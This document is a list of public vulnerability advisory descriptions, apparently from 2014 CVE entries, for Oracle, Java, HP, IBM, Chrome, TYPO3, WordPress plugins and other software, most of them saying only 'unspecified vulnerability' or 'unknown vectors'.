Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Archive Utility.
Unspecified vulnerability in Oracle Java SE 8u20 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-6453, CVE-2014-6545, and CVE-2014-6560.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20, when running on Internet Explorer, allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the Oracle Communications Session Border Controller component in Oracle Communications Applications SCX640m5 allows remote authenticated users to affect availability via unknown vectors related to Lawful Intercept.
Unspecified vulnerability in the Oracle Access Manager component in Oracle Fusion Middleware 11.1.2.1 and 11.1.2.2 allows remote attackers to affect integrity via unknown vectors related to Admin Console.
Unspecified vulnerability in the Agile PLM component in Oracle Supply Chain Products Suite 9.3.1.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Roles &amp; Privileges.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 7u67 and 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4298, CVE-2014-4299, CVE-2014-4300, CVE-2014-6452, and CVE-2014-6542.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2014-6467, CVE-2014-6545, and CVE-2014-6560.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4298, CVE-2014-4299, CVE-2014-4300, CVE-2014-6454, and CVE-2014-6542.
Unspecified vulnerability in the ke DomPDF extension before 0.0.5 for TYPO3 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the LDAP (eu_ldap) extension before 2.8.18 for TYPO3 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in the CWT Frontend Edit (cwt_feedit) extension before 1.2.5 for TYPO3 allows remote authenticated users to execute arbitrary code via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in IBM WebSphere Service Registry and Repository (WSRR) 6.3.x before 6.3.0.5, 7.0.x before 7.0.0.5, 7.5.x before 7.5.0.3, and 8.0.x before 8.0.0.2 allow remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in IBM Security Identity Manager 5.1, 6.0, and 7.0 allows remote attackers to hijack the authentication of users for requests that can cause cross-site scripting attacks, web cache poisoning, or other unspecified impacts via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in Huawei HiLink E3276 and E3236 TCPU before V200R002B470D13SP00C00 and WebUI before V100R007B100D03SP01C03, E5180s-22 before 21.270.21.00.00, and E586Bs-2 before 21.322.10.00.889 allow remote attackers to hijack the authentication of users for requests that (1) modify configurations, (2) send SMS messages, or have other unspecified impact via unknown vectors.
Unspecified vulnerability in the Authentication Module in TIBCO Spotfire Server before 4.5.2, 5.0.x before 5.0.3, 5.5.x before 5.5.2, 6.0.x before 6.0.3, and 6.5.x before 6.5.1 allows remote attackers to gain privileges, and obtain sensitive information or modify data, via unknown vectors.
Xen 4.4.x, when running on an ARM system and "handling an unknown system register access from 64-bit userspace," returns to an instruction of the trap handler for kernel space faults instead of an instruction that is associated with faults in 64-bit userspace, which allows local guest users to cause a denial of service (crash) and possibly gain privileges via a crafted process.
Cross-site request forgery (CSRF) vulnerability in WP Security Audit Log plugin before 1.2.5 for WordPress allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the Brute Force Login Protection module 1.3 for WordPress allows remote attackers to hijack the authentication of unspecified users for requests that have unknown impact via a crafted request to the brute-force-login-protection page to wp-admin/options-general.php.
Unspecified vulnerability in IBM WebSphere Portal 6.1.0 through 6.1.0.6 CF27, 6.1.5 through 6.1.5.3 CF27, 7.0 through 7.0.0.2 CF28, 8.0 through 8.0.0.1 CF14, and 8.5.0 before CF03 allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in Piwigo before 2.6.3 has unknown impact and attack vectors, related to a "security failure."
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4298, CVE-2014-4299, CVE-2014-6452, CVE-2014-6454, and CVE-2014-6542.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4298, CVE-2014-4300, CVE-2014-6452, CVE-2014-6454, and CVE-2014-6542.
Unspecified vulnerability in the SQLJ component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4299, CVE-2014-4300, CVE-2014-6452, CVE-2014-6454, and CVE-2014-6542.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4297, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4294, CVE-2014-6538, and CVE-2014-6563.
Unspecified vulnerability in the Java VM component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4295, CVE-2014-6538, and CVE-2014-6563.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4292, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4291, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4290, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the JPublisher component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, 12.1.0.1, and 12.1.0.2 allows remote authenticated users to affect confidentiality via unknown vectors, a different vulnerability than CVE-2014-4291, CVE-2014-4292, CVE-2014-4293, CVE-2014-4296, CVE-2014-4297, CVE-2014-4310, CVE-2014-6547, and CVE-2014-6477.
Unspecified vulnerability in the JDBC component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors, a different vulnerability than CVE-2014-6544.
Unspecified vulnerability in Oracle Java SE 6u81, 7u67, and 8u20 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2014-6493, CVE-2014-6503, and CVE-2014-6532.
Unspecified vulnerability in the Oracle Applications Technology component in Oracle E-Business Suite 11.5.10.2 allows remote attackers to affect integrity via unknown vectors related to Reports Configuration.
Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect confidentiality via unknown vectors related to Automated Install Engine, a different vulnerability than CVE-2014-4277.
Unspecified vulnerability in the Oracle Applications Framework component in Oracle E-Business Suite 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect integrity via unknown vectors related to Portal Integration.
Unspecified vulnerability in the Oracle Applications Technology Stack component in Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, 12.2.3, and 12.2.4 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Oracle Forms.
Unspecified vulnerability in Oracle Sun Solaris 11 allows remote attackers to affect confidentiality via unknown vectors related to Automated Install Engine, a different vulnerability than CVE-2014-4283.
Unspecified vulnerability in the Hyperion Essbase component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote attackers to affect availability via unknown vectors related to Agent.
Unspecified vulnerability in the Hyperion Common Admin component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote authenticated users to affect confidentiality via unknown vectors related to User Interface, a different vulnerability than CVE-2014-4269.
Unspecified vulnerability in the Hyperion Common Admin component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows remote authenticated users to affect confidentiality via unknown vectors related to User Interface, a different vulnerability than CVE-2014-4270.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality via unknown vectors related to Swing.
Unspecified vulnerability in Oracle Java SE 7u60 and 8u5 allows remote attackers to affect integrity via unknown vectors related to Serviceability.
Unspecified vulnerability in Oracle Java SE 6u75, 7u60, and 8u5 allows remote attackers to affect integrity via unknown vectors related to Deployment.
Unspecified vulnerability in Oracle Java SE 7u60 and 8u5 allows remote attackers to affect availability via unknown vectors related to Security.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5, and JRockit R27.8.2 and R28.3.2, allows remote attackers to affect confidentiality and integrity via unknown vectors related to "Diffie-Hellman key agreement."
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox before 3.2.24, 4.0.26, 4.1.34, 4.2.26, and 4.3.14 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core, a different vulnerability than CVE-2014-2487.
Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Systems Products Suite 3.3 and 4.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors related to System management.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.7.0 and 11.1.1.8.0 allows remote attackers to affect confidentiality via unknown vectors related to Portlet Services.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality via unknown vectors related to Security.
Unspecified vulnerability in the Siebel Core - Server OM Frwks component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote authenticated users to affect confidentiality via unknown vectors related to Object Manager.
Unspecified vulnerability in the BI Publisher component in Oracle Fusion Middleware 11.1.1.7 allows remote attackers to affect confidentiality via unknown vectors related to Mobile Service.
Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.2, and 12.2.3 allows local users to affect confidentiality via unknown vectors related to Logging.
Unspecified vulnerability in Oracle Java SE 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to JavaFX.
Unspecified vulnerability in the RDBMS Core component in Oracle Database Server 11.1.0.7, 11.2.0.3, 11.2.0.4, and 12.1.0.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5, and JRockit R27.8.2 and JRockit R28.3.2, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Security.
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0, 10.3.6.0, 12.1.1.0, and 12.1.2.0 allows remote attackers to affect integrity via unknown vectors related to Console.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11.1 allows remote authenticated users to affect confidentiality via unknown vectors related to Common Agent Container (Cacao).
Unspecified vulnerability in the RDBMS Core component in Oracle Database Server 11.2.0.4 and 12.1.0.1 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the RDBMS Core component in Oracle Database Server 11.2.0.4 and 12.1.0.1 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Oracle iStore component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.3, 12.2.2, and 12.2.3 allows remote authenticated users to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.1, 6.2, 6.3, 6.3.1, 6.3.2, 6.3.3, and 6.3.4 allows remote attackers to affect confidentiality via unknown vectors related to Data, Domain &amp; Function Security.
Unspecified vulnerability in the Oracle Secure Global Desktop (SGD) component in Oracle Virtualization 4.63, 4.71, 5.0, and 5.1 allows remote attackers to affect integrity via unknown vectors related to Workspace Web Application, a different vulnerability than CVE-2014-2463.
Unspecified vulnerability in the Siebel Travel &amp; Transportation component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Diary.
Unspecified vulnerability in the Oracle Transportation Management component in Oracle Supply Chain Products Suite 6.2, 6.3, 6.3.1, 6.3.2, 6.3.3, and 6.3.4 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Data, Domain, and Function Security.
Unspecified vulnerability in Oracle Java SE 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Unspecified vulnerability in the PeopleSoft Enterprise FIN Install component in Oracle PeopleSoft Products 9.1 and 9.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Patch installation scripts.
Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11.1 allows local users to affect availability via unknown vectors related to sockfs.
Unspecified vulnerability in Oracle Java SE 7u60 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries, a different vulnerability than CVE-2014-2483.
Unspecified vulnerability in Oracle Java SE 7u60 and 8u5 allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 7u60 and 8u5 allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2014-4208.
Unspecified vulnerability in Oracle Java SE 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5 allows remote attackers to affect integrity via unknown vectors related to Libraries.
Unspecified vulnerability in Oracle Java SE 5.0u65, 6u75, 7u60, and 8u5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Hotspot.
Unspecified vulnerability in the Oracle Applications Manager component in Oracle E-Business Suite 12.0.6, 12.1.3, 12.2.2, and 12.2.3 allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Oracle Fusion Middleware component in Oracle Fusion Middleware 11.1.1.7 allows remote attackers to affect confidentiality via unknown vectors related to Process Mgmt and Notification.
Unspecified vulnerability in the Oracle WebCenter Portal component in Oracle Fusion Middleware 11.1.1.7 and 11.1.1.8 allows remote attackers to affect integrity via unknown vectors related to Portlet Services.
Unspecified vulnerability in the Java SE component in Oracle Java SE 7u60 and 8u5 allows remote attackers to affect integrity via unknown vectors related to Deployment, a different vulnerability than CVE-2014-4220.
Unspecified vulnerability in the Hyperion Enterprise Performance Management Architect component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows local users to affect integrity and availability via unknown vectors related to Data Synchronizer.
Unspecified vulnerability in the Siebel UI Framework component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect integrity via unknown vectors related to Portal Framework, a different vulnerability than CVE-2014-2491.
Unspecified vulnerability in the Hyperion Enterprise Performance Management Architect component in Oracle Hyperion 11.1.2.2 and 11.1.2.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Property Editing.
Cross-site request forgery (CSRF) vulnerability in Hitachi Tuning Manager before 7.6.1-06 and 8.x before 8.0.0-04 and JP1/Performance Management - Manager Web Option 07-00 through 07-54 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Multiple unspecified vulnerabilities in Libav before 0.8.12 allow remote attackers to have unknown impact and vectors.
Multiple cross-site scripting (XSS) vulnerabilities in unspecified backend components in TYPO3 4.5.0 before 4.5.34, 4.7.0 before 4.7.19, 6.0.0 before 6.0.14, 6.1.0 before 6.1.9, and 6.2.0 before 6.2.3 allow remote authenticated editors to inject arbitrary web script or HTML via unknown parameters.
Samsung iPOLiS Device Manager before 1.8.7 allow remote attackers to execute arbitrary code via unspecified values to the (1) Start, (2) ChangeControlLocalName, (3) DeleteDeviceProfile, (4) FrameAdvanceReader, or other unknown method in the XNSSDKDEVICE.XnsSdkDeviceCtrlForIpInstaller.1 ActiveX control.
Cross-site request forgery (CSRF) vulnerability in the TinyMCE Color Picker plugin before 1.2 for WordPress allows remote attackers to hijack the authentication of unspecified users for requests that change plugin settings via unknown vectors.  NOTE: some of these details are obtained from third party information.
Cross-site request forgery (CSRF) vulnerability in the Search Everything plugin before 8.1.1 for WordPress allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in PowerDNS Recursor (aka pdns_recursor) 3.6.x before 3.6.1 allows remote attackers to cause a denial of service (crash) via an unknown sequence of malformed packets.
Unspecified vulnerability in Apache Traffic Server 3.x through 3.2.5, 4.x before 4.2.1.1, and 5.x before 5.0.1 has unknown impact and attack vectors, possibly related to health checks.
The REST API in the ovirt-engine in oVirt, as used in Red Hat Enterprise Virtualization (rhevm) 3.4, allows remote authenticated users to read arbitrary files and have other unspecified impact via unknown vectors, related to an XML External Entity (XXE) issue.
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco WebEx Meetings Server 1.5(.1.131) and earlier allows remote attackers to hijack the authentication of unspecified victims via unknown vectors, aka Bug ID CSCuj81735.
Multiple unspecified vulnerabilities in Google Chrome before 38.0.2125.101 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Use-after-free vulnerability in the Web Workers implementation in Google Chrome before 38.0.2125.101 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the ProcessingInstruction::setXSLStyleSheet function in core/dom/ProcessingInstruction.cpp in the DOM implementation in Blink, as used in Google Chrome before 38.0.2125.101, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
The chrome_pdf::CopyImage function in pdf/draw_utils.cc in the PDFium component in Google Chrome before 38.0.2125.101 does not properly validate image-data dimensions, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 37.0.2062.120 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 37.0.2062.94 allow attackers to cause a denial of service or possibly have other impact via unknown vectors, related to the load_truetype_glyph function in truetype/ttgload.c in FreeType and other functions in other components.
Multiple unspecified vulnerabilities in Google Chrome before 36.0.1985.143 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Multiple unspecified vulnerabilities in Google Chrome before 36.0.1985.125 allow attackers to cause a denial of service or possibly have other impact via unknown vectors.
Unspecified vulnerability in the Security component in IBM Systems Director 6.3.0 through 6.3.5 allows local users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in IBM Security Access Manager (ISAM) for Mobile 8.0 and IBM Security Access Manager for Web 7.0 and 8.0 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in IBM Security QRadar SIEM 7.1 MR2 and 7.2 MR2 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in IBM API Management 3.0.0.0, when basic authentication is used for APIs, allows remote attackers to bypass intended restrictions on topology access, and obtain sensitive information, via unknown vectors.
wolfSSL CyaSSL before 2.9.4 does not properly validate X.509 certificates with unknown critical extensions, which allows man-in-the-middle attackers to spoof servers via crafted X.509 certificate.
Unspecified vulnerability in the Diffie-Hellman key agreement implementation in the management GUI Java applet in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway before 9.3-66.5 and 10.x before 10.1-122.17 has unknown impact and vectors.
PaperThin CommonSpot before 7.0.2 and 8.x before 8.0.3 does not check authorization in unspecified situations, which allows remote authenticated users to perform actions via unknown vectors.
Stack-based buffer overflow in cifskey.c or cifscreds.c in cifs-utils before 6.4, as used in pam_cifscreds, allows remote attackers to have unspecified impact via unknown vectors.
Unspecified vulnerability in Papercut MF and NG before 14.1 (Build 26983) allows attacker to cause a denial of service via unknown vectors.
Unspecified vulnerability in the print release functionality in PaperCut MF before 14.1 (Build 26983) has unknown impact and remote vectors, related to embedded MFPs.
Unspecified vulnerability in HP Operations Manager 9.20 on UNIX allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Operations Manager 9.10 and 9.11 on UNIX allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Network Automation 9.10 and 9.20 allows local users to bypass intended access restrictions via unknown vectors.
HP Systems Insight Manager (SIM) before 7.4 allows remote attackers to conduct clickjacking attacks via unknown vectors.
Cross-site scripting (XSS) vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) before 7.4 allows remote authenticated users to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP MPIO Device Specific Module Manager before 4.02.00 allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Sprinter 12.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2344.
Unspecified vulnerability in HP Sprinter 12.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2342.
Unspecified vulnerability in HP Sprinter 12.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2336.
Unspecified vulnerability in HP Sprinter 12.01 allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2343.
Unspecified vulnerability in the server in HP Service Manager (SM) 7.21 and 9.x before 9.34 allows remote attackers to bypass intended access restrictions, and modify data or cause a denial of service, via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in the server in HP Service Manager (SM) 7.21 and 9.x before 9.34 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the WebTier component in HP Service Manager (SM) 7.21 and 9.x before 9.34 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Application Lifecycle Management (aka Quality Center) 11.5x and 12.0x allows local users to gain privileges via unknown vectors, aka ZDI-CAN-2138.
Unspecified vulnerability in HP Operations Agent 11.00, when Glance is used, allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Enterprise Maps 1 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP NonStop NetBatch G06.14 through G06.32.01, H06 through H06.28, and J06 through J06.17.01 allows remote authenticated users to gain privileges for NetBatch job execution via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x, 9.1x, and 9.2x allows remote attackers to execute arbitrary code via unknown vectors, aka ZDI-CAN-2264.
Unspecified vulnerability in HP Storage Data Protector 8.x allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Intelligent Management Center (iMC) before 7.0 E02020P03 and Branch Intelligent Management System (BIMS) before 7.0 E0201P02 allows remote authenticated users to obtain sensitive information or modify data via unknown vectors, aka ZDI-CAN-2312.
Unspecified vulnerability in HP Intelligent Management Center (iMC) before 7.0 E02020P03 and Branch Intelligent Management System (BIMS) before 7.0 E0201P02 allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-2090.
Unspecified vulnerability in HP Intelligent Management Center (iMC) before 7.0 E02020P03 and Branch Intelligent Management System (BIMS) before 7.0 E0201P02 allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-2089.
Unspecified vulnerability in HP Intelligent Management Center (iMC) before 7.0 E02020P03 and Branch Intelligent Management System (BIMS) before 7.0 E0201P02 allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-2088.
Unspecified vulnerability in HP Intelligent Management Center (iMC) before 7.0 E02020P03 and Branch Intelligent Management System (BIMS) before 7.0 E0201P02 allows remote attackers to obtain sensitive information via unknown vectors, aka ZDI-CAN-2080.
Unspecified vulnerability in HP Universal CMDB 10.01 and 10.10 allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors, aka ZDI-CAN-2104.
Unspecified vulnerability in HP Universal CMDB 10.01 and 10.10 allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors, aka ZDI-CAN-2091.
Unspecified vulnerability in HP Universal CMDB 10.01 and 10.10 allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors, aka ZDI-CAN-2083.
Unspecified vulnerability in HP SiteScope 11.1x through 11.13 and 11.2x through 11.24 allows remote attackers to bypass authentication via unknown vectors, aka ZDI-CAN-2140.
Unspecified vulnerability in HP Release Control 9.x before 9.13 p3 and 9.2x before RC 9.21.0003 p1 on Windows and 9.2x before RC 9.21.0002 p1 on Linux allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP Release Control 9.x before 9.13 p3 and 9.2x before RC 9.21.0003 p1 on Windows and 9.2x before RC 9.21.0002 p1 on Linux allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Smart Update Manager 6.x before 6.4.1 on Windows, and 6.2.x through 6.4.x before 6.4.1 on Linux, allows local users to obtain sensitive information, and consequently gain privileges, via unknown vectors.
Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP StoreVirtual 4000 Storage and StoreVirtual VSA 9.5 through 11.0 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP IceWall SSO 10.0 Dfw and IceWall MCRP 2.1 and 3.0 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability on HP 8/20q switches, SN6000 switches, and 8Gb Simple SAN Connection Kit with firmware before 8.0.14.08.00 allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP OneView 1.0 and 1.01 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in HP IceWall Identity Manager 4.0 through SP1 and 5.0 and IceWall SSO 10.0 Password Reset Option, when Apache Commons FileUpload is used, allows remote authenticated users to cause a denial of service via unknown vectors.
